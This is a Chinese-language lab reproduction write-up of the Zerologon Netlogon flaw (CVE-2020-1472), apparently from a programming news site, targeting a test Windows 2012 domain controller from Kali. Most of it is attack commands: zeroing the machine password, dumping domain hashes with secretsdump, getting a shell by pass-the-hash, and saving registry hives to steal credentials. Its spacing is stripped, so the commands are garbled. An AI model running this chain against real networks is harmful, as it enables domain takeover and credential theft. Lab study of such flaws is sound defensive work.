Netlogon特权提升漏洞CVE 2020-1472该如何复习

Netlogon特权提升漏洞CVE 2020-1472该如何复习

Netlogon特权提升漏洞CVE 2020-1472该如何复习,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

1.复现环境

DC:
os:windows 2012 server
ip:192.168.236.132

攻击机:
os:kali
ip:192.168.236.130

2.影响版本

WindowsServer2008R2forx64-basedSystemsServicePack1WindowsServer2008R2forx64-basedSystemsServicePack1(ServerCoreinstallation)WindowsServer2012WindowsServer2012(ServerCoreinstallation)WindowsServer2012R2WindowsServer2012R2(ServerCoreinstallation)WindowsServer2016WindowsServer2016(ServerCoreinstallation)WindowsServer2019WindowsServer2019(ServerCoreinstallation)WindowsServer,version1903(ServerCoreinstallation)WindowsServer,version1909(ServerCoreinstallation)WindowsServer,version2004(ServerCoreinstallation)

3.域控环境搭建参考文章

sectool/251828.html

4.复现过程

4.1 漏洞验证

POC链接

4.2 漏洞利用

安装最新的Impacket,否则会报错

4.2.1 下载攻击exp

EXP下载

4.2.2 置空密码

python3cve-2020-1472-exploit.pyWIN-F6STUQIU7D8192.168.236.132

4.2.3 获取hash

进入到impacket/examples

python3secretsdump.pyDOMAIN/WIN-F6STUQIU7D8\$@192.168.236.132-just-dc-no-pass

4.2.4 获取shell

python3wmiexec.py-hashes<HASH>DOMAIN/administrator\@IP

4.2.5 获取原hash

regsaveHKLM\SYSTEMsystem.saveregsaveHKLM\SAMsam.saveregsaveHKLM\SECURITYsecurity.savegetsystem.savegetsam.savegetsecurity.savedel/fsystem.savedel/fsam.savedel/fsecurity.saveexit

4.2.6 解析hash

保存$MACHINE.ACC部分:XXXXXXXXXXXXXX:XXXXXXX

python3secretsdump.py-samsam.save-systemsystem.save-securitysecurity.saveLOCAL

4.2.7 恢复hash

恢复链接

python3reinstall_original_pw.pyDC_NETBIOS_NAMEDC_IP_ADDR<ORI_HASH>

4.2.8 验证是否恢复

使用获取hash的命令来验证是否恢复

python3secretsdump.pyDOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR-just-dc-no-pass

5.修复建议

官方修复建议

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注恰卡编程网行业资讯频道,感谢您对恰卡编程网的支持。

发布于 2021-12-28 21:05:39
收藏
分享
海报
0 条评论
118
上一篇:OpenSSH命令注入漏洞CVE-2020-15778该如何分析 下一篇:Apche Solr 未授权上传漏洞CVE-2020-13957的复现
目录

    0 条评论

    本站已关闭游客评论,请登录或者注册后再评论吧~

    忘记密码?

    图形验证码